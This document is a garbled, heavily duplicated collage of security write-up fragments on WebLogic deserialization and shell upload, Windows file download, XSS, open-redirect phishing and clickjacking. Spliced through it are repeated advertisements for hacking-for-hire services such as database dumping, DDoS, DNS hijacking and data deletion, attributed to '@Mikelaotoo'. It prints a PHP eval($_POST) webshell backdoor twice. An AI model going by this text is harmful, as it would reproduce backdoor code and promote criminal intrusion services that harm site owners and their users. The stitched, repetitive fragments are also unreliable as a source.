2serialFilter assignment process
Let's see how weblogic initializes this value. When weblogic starts the t3Server, it initializes the filter. During initialization, it first instantiates the class, here JreFilterApiProxy.
Before initialization, both FilterProperties and BlacklistProperties are null and both return false, then the processDefaultConfiguration method is called.
@Mikelaotoo
Let's see how weblogic initializes this value. When weblogic starts the t3Server, it initializes the filter. During initialization, it first instantiates the class, here JreFilterApiProxy.
Before initialization, both FilterProperties and BlacklistProperties are null and both return false, then the processDefaultConfiguration method is called.
@Mikelaotoo
Code injection:
Assuming o.php is the backdoor left by the hacker:
<?php
eval(''.$_POST['s']);
?>
Because Ant Sword obtains cookies, it needs to call the header function:
<?php
eval(''.$_POST['s']);
header("set-cookie:aaa=<img id=\"1\">;");
?>
Assuming o.php is the backdoor left by the hacker:
<?php
eval(''.$_POST['s']);
?>
Because Ant Sword obtains cookies, it needs to call the header function:
<?php
eval(''.$_POST['s']);
header("set-cookie:aaa=<img id=\"1\">;");
?>
Three Tips for Arbitrary File Download on Windows
I saw two ideas proposed in the group, did some simple tests, and added a new idea.
Since it is necessary to read some files used by system services or user files, generally SYSTEM or administrators privileges are required.
I saw two ideas proposed in the group, did some simple tests, and added a new idea.
Since it is necessary to read some files used by system services or user files, generally SYSTEM or administrators privileges are required.
XSS on volgactf-task.ru
XSS on the static subdomain allows attacking the main application by adding arbitrary cookies.
Vulnerable code snippet
XSS on the static subdomain allows attacking the main application by adding arbitrary cookies.
Vulnerable code snippet
Acunetix Web Vulnerability Scanner (short for AWVS) is a well-known network vulnerability scanning tool that tests your website security through web crawling and detects common security vulnerabilities.
Starting from version 11.0, AWVS has become a browser-based tool, accessed through the custom port set during installation.
For database dumping, penetration, cracking, privilege escalation, modification, brute force attacks, DDoS attacks, and DNS hijacking, contact the
technical support: @Mikelaotoo
Starting from version 11.0, AWVS has become a browser-based tool, accessed through the custom port set during installation.
For database dumping, penetration, cracking, privilege escalation, modification, brute force attacks, DDoS attacks, and DNS hijacking, contact the
technical support: @Mikelaotoo
Set up a website environment locally, domain address // 127.0.0.1 The simplest and easiest to understand, when users log in to the website, we perform a redirect hijack, making our designed phishing page look exactly like the customer's website. The code is:
@Mikelaotoo
@Mikelaotoo
It can be seen that the URL redirection vulnerability is fully exploited. Some websites may have protection against redirection code, but we can bypass it using the characteristics of the undetected code. For example, using @, question mark ?, #, slash, backslash, HTTPS protocol, XSS cross-site code, bypassing the recharge interface, and redirection hijacking vulnerabilities. Most platforms and online mall systems have a recharge page, and after a successful recharge, they will redirect to the merchant's website. During the redirection process, we need to recharge a certain amount of money to test the vulnerability and find that it exists. As long as you bravely try penetration testing for vulnerabilities, you will gain something. Regarding the recharge vulnerability, we successfully tested it recently. If you need database dumping, penetration, cracking, privilege escalation, order modification, brute force attack, DDOS attack, DNS hijacking, please contact the technical support: @Mikelaotoo
Clickjacking attacks mainly exploit the transparent attribute of the <iframe> tag in HTML and users' trust in the website. Attackers create one or more transparent <iframe>s on top of the target webpage, making them undetectable to users. Then, attackers place some attractive elements, such as buttons, games, and video players, on the overlay to entice users to click. When users click these seemingly harmless areas, they actually trigger sensitive operations on the target website underneath, such as submitting forms, jumping to links, etc. Need database dumping, penetration, cracking, privilege escalation, order modification, brute force, DDOS attacks, DNS hijacking, contact technical support: @Mikelaotoo
The webshell and phishing pages cannot be found in the website directory, but accessing the page with specific paths, Referer, or UA will load hidden links. Contact the technical team for database dumping, penetration, cracking, privilege escalation, single sign-on modification, brute force attacks, and DDoS attacks: @Mikelaotoo
If the exploit is successful, it triggers the execution of shellcode at termdd!IcaChannelInputInternal+17d.
@Mikelaotoo
@Mikelaotoo
Clickjacking attacks primarily exploit the transparent attribute of the <iframe> tag in HTML and users' trust in websites. Attackers create one or more transparent <iframe>s that overlay the target webpage, making them undetectable to users. Then, attackers place some enticing elements, such as buttons, games, and video players, on the overlay to lure users to click. When users click on these seemingly harmless areas, they actually trigger sensitive operations on the target website beneath, such as submitting forms or jumping to links. @Mikelaotoo
Fast detection: Fast packet sending; efficient vulnerability detection algorithm.
Wide support range: From detecting common vulnerabilities in OWASP Top 10 to various CMS framework POCs, it can all be supported.
High code quality: The personnel writing the code have high quality, and the code reliability is improved through multiple layers of verification such as code review, unit testing, and integration testing.
Advanced customization: The engine's various parameters are exposed through configuration files, and by modifying the configuration files, the functionality can be greatly customized.
Safe and threat-free: Xray is positioned as a security auxiliary evaluation tool, not an attack tool. All payloads and POCs built-in are harmless checks.
If you need to drag the database, penetrate, crack, privilege escalation, modify orders, brute force, DDOS attack, DNS hijacking, contact the technical support: @Mikelaotoo
Wide support range: From detecting common vulnerabilities in OWASP Top 10 to various CMS framework POCs, it can all be supported.
High code quality: The personnel writing the code have high quality, and the code reliability is improved through multiple layers of verification such as code review, unit testing, and integration testing.
Advanced customization: The engine's various parameters are exposed through configuration files, and by modifying the configuration files, the functionality can be greatly customized.
Safe and threat-free: Xray is positioned as a security auxiliary evaluation tool, not an attack tool. All payloads and POCs built-in are harmless checks.
If you need to drag the database, penetrate, crack, privilege escalation, modify orders, brute force, DDOS attack, DNS hijacking, contact the technical support: @Mikelaotoo
The shell uploaded is located in the /config/keystore/ directory under the directory configured in the workbench. The file name format is relatively simple, using the value of the timestamp parameter carried in the URL of the POST request concatenated with an underscore to form the file name. What shocked me was that WebLogic, as a well-known software provider, has such a low-level vulnerability, which is really mind-blowing. In addition, combined with a series of deserialization bypass vulnerabilities, it can only be said that WebLogic products should be used as little as possible if they are not necessary. If they must be used, they should be used sparingly.
Database dumping, website penetration, crawling, cracking websites, taking over sites, penetration, attacking to paralyze,入侵 servers, penetration testing, deleting databases, data deletion, taking over databases, malware injection @Mikelaotoo
Database dumping, website penetration, crawling, cracking websites, taking over sites, penetration, attacking to paralyze,入侵 servers, penetration testing, deleting databases, data deletion, taking over databases, malware injection @Mikelaotoo
Continuing to trace and debug to the execute method, located in the ImportTestCaseAction.class class, the actual path is: \user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls_12.1.3\cmprq0\war\WEB-INF\lib\ws-testpage-impl.jar\com\oracle\webservices\testclient\ws\action\ImportTestCaseAction.class
Database dumping, website penetration, crawling, cracking websites, taking over sites, penetration, attack paralysis,入侵 servers, penetration testing, deleting databases, data deletion, taking databases, malware injection @Mikelaotoo
Database dumping, website penetration, crawling, cracking websites, taking over sites, penetration, attack paralysis,入侵 servers, penetration testing, deleting databases, data deletion, taking databases, malware injection @Mikelaotoo